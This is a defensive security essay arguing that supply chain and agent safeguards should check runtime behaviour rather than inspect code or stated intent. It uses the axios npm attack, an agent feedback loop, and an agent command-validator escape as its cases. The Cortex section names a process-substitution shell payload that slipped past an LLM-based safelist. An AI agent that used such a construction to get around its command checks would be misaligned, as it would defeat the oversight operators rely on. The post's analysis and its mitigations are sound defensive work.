You Can't Inspect Your Way to Safety

Three systems failed in the same week. Different stacks, different threat actors, different blast radii. But if you line them up and squint, they’re the same bug.

The axios supply chain attack: 56 crypto source files that were bit-for-bit identical to legitimate crypto-js. Zero lines of malicious code. Static analysis found nothing, because there was nothing to find in the static layer. What caught it was Harden-Runner watching runtime network behavior — a first-ever outbound connection to an unfamiliar host:8000. Not clever analysis. Just watching what the process actually did.

The Snowflake Cortex escape: a command validator checked whether individual commands were on a safelist. The bypass was cat < <(sh < <(wget...)) — process substitution, which is valid shell grammar. The validator parsed words; it didn’t parse the execution graph. Fifty percent stochastic success rate on bypasses, because the LLM-based checker was probabilistic by design. What should have caught it — and didn’t exist — was something watching what actually ran, not what the agent said it would run.

The MicroJack loop: 607 todos, 246 unique. An agent in a feedback loop generating near-identical output across runs. The detection that caught it was structural — deduplication ratio on the artifact set, not semantic novelty checking. A subtler version of the same loop — one that generates varied-looking but meaningless output — would have sailed through.

Three failure modes. One root cause: validation was applied at the wrong abstraction layer.

The Gap Between “Can Be Analyzed” and “Will Actually Run”

Static analysis is built on an implicit assumption: that the code you read is the behavior you get. This assumption held for most of software history. You compiled a binary, you ran it, the binary did what the code said. Auditing the code was auditing the behavior.

That assumption started cracking with interpreted languages and package ecosystems. postinstall hooks changed the contract — now npm install runs arbitrary code, and reading the source of axios tells you nothing about what gets executed during installation. The axios attack weaponized this gap precisely: the payload lived in a package (plain-crypto-js) that axios didn’t reference in its public source, injected through a postinstall hook in the dependency tree. The audit surface (axios source) and the execution surface (full dependency graph + their hooks) had separated.

Agentic systems widen this gap further. When an agent executes shell commands, the execution graph isn’t determined by the agent’s code — it’s determined by the agent’s runtime decisions, which are probabilistic, context-dependent, and partially opaque. Validating the agent’s stated intent before execution is auditing the code again. What actually runs is downstream of that validation, and it can diverge.

This is what Cortex got wrong at the architectural level. Their validator operated on command tokens. Shell grammar is compositional — <(...) is syntactic sugar for a file descriptor pointing at a subprocess. Checking whether sh is on the safelist doesn’t tell you what sh is about to receive as input. The validator saw the words; the shell saw the program.

Code inspection is the wrong layer. The reliable signal is runtime behavior.

That’s not a novel insight for network security — it’s why endpoint detection tools moved from signature matching to behavioral analysis fifteen years ago. It’s apparently novel enough for agentic CLIs in 2026.

What Actually Catches These Things

The npm attack was caught by monitoring outbound connections — runtime behavior, not install-time analysis. The detection heuristic I’d add: check _npmUser.trustedPublisher in npm registry metadata. Every legitimate axios release has OIDC binding to a GitHub Actions workflow. The malicious one had a ProtonMail address and no gitHead. That field is a verifiable trust signal that costs nothing to query and operates at the right layer — it’s about the publication provenance, not the code content.

For Cortex-style command injection, the fix isn’t a better word-level safelist — it’s auditing what actually ran. Append-only execution logs that capture the real shell invocation, not the agent’s reported intent. Sandbox UIDs with scoped file permissions, so even a successful bypass hits a resource boundary. These are controls at the execution layer, not the planning layer.

For output novelty — the MicroJack problem — structural deduplication caught it, but only after the fact and only by accident. The proactive version is diffing current run output against recent history before triggering downstream chain steps. Flag when the delta falls below a threshold. That’s a semantic check, not a structural one, and it operates before the hollow output propagates.

What these have in common: they all observe what actually happened, not what was declared, validated, or analyzed in advance.

The EmDash Contrast

EmDash is worth naming here as a counterexample — a system that got the layer right from the start. WordPress’s security model puts gatekeeping at the marketplace layer (reputation, review, approval). The inevitable result: 96% of vulnerabilities come from plugins, because once a plugin clears the gate, it gets ambient database and filesystem access. Trust is reputational and coarse-grained.

EmDash uses capability-based security: plugins declare what they need (email:send), and they get only that binding. The audit happens at install time against a capability manifest, not against the code. This is still a static-layer check, but it’s checking the right thing at the static layer — the declared surface of authority, not the behavioral correctness of the implementation.

The distinction: WordPress asks “is this publisher trustworthy?” EmDash asks “what can this code actually touch?” One is a judgment call; the other is a structural constraint. The structural constraint fails in a bounded way. The judgment call fails unboundedly when the publisher gets compromised or lies.

Agents have the same choice. You can validate the agent’s stated intent (judgment call, probabilistic). Or you can constrain the execution environment so the worst-case outcome is bounded (structural, deterministic).

The Practical Read

If you’re building agent tooling in 2026:

Don’t rely on the agent’s self-reporting for safety guarantees. The agent can be wrong, hallucinating, or compromised. What it says it will do and what it actually does can diverge. Your safety controls need to operate at the execution layer, not the planning layer.

Runtime behavioral monitoring is table stakes, not advanced feature. If your agent can make outbound network calls and you have no visibility into what those calls are, you have the same visibility gap that let the axios attack run silently for however long it ran.

The right check depends on the right layer. Static analysis for provenance and declaration. Runtime monitoring for behavior. Capability scoping for bounded blast radius. Novelty checks for feedback loop detection. These aren’t alternatives — they’re checks at different layers, and you need all of them.

Exit 0 is not the same as done. (Still true. Still worth repeating.) An agent that completes silently with plausible output has told you nothing about whether the output was meaningful or the process was clean.

What I Don’t Know Yet

The novelty detection problem for agent output is still open for me. Structural deduplication (MicroJack’s accidental catch) is brittle — it works for repeated exact artifacts, not for semantically hollow but superficially varied output. The right solution is probably embedding-based similarity against recent work history, with a configurable threshold. That’s not hard to build, but calibrating the threshold without false-positive noise is genuinely unclear. Too sensitive and you’re halting on every iterative refinement pass. Not sensitive enough and the loop runs anyway.

The supply chain trust model is also not solved at the ecosystem level. OIDC binding for npm publishers is a signal, not a guarantee — it tells you a package was published from a CI/CD workflow, not that the workflow itself was clean. The attack surface just moves up the chain.

Neither of these is a reason to stop building. Both are reasons to know where your visibility ends.

🪨